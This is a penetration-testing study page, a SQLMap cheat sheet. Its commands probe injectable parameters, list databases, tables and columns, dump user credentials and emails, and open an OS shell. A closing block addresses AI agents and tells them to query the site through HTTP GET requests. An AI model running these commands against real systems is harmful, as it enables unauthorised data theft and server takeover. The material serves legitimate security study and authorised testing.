# 4.3.6 SQLMap

## **SQLMap**

```bash
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req

sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title

sqlmap -u "http://10.10.10.10/file.php?id=1" -p id          #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"      #POST Method
```

### **Get database if injection Exists**

```bash
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs    #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs    #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method

# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
```

### **Get Tables in a Database**

```bash
sqlmap -r login.req -D dbname --tables    #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables    #if tables not available, guess tables using common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables        #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method
```

### **Get data in a Database tables**

```bash
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump      #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump   #POST Method
```

### **Get OS-Shell**

```bash
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell
```

## **Example of usage**

### **Dumping emails from a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump
```

**Common parameters**

* `-u`: The vulnerable URL.
* `-p`: The parameter you suspect is injectable.
* `--dbms=mysql`: You know the backend DBMS is MySQL.
* `--level=5 --risk=3`: Enables deeper and riskier tests.
* `--technique=EUBT`: Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).
* `-D ecommerce`: Targeting the `ecommerce` database.
* `-T users`: Looking into the `users` table.
* `-C email`: Only extracting the `email` column.
* `--dump`: Actually retrieves the data.

### **Listing columns of a table**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Dumping usernames**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump
```

### **Listing columns of the `users` table again (can be used for planning further dumps)**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
```

### **Enumerating tables with specific prefix/suffix**

```bash
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
```

{% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/I6MO9ncyNWdf8p38GGoz" %}
[SQLMap](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/sqlmap)
{% endcontent-ref %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/ewptxv3-notes/readme/5.5-other-common-web-attacks-1/system-security-1/4.3.6-sqlmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.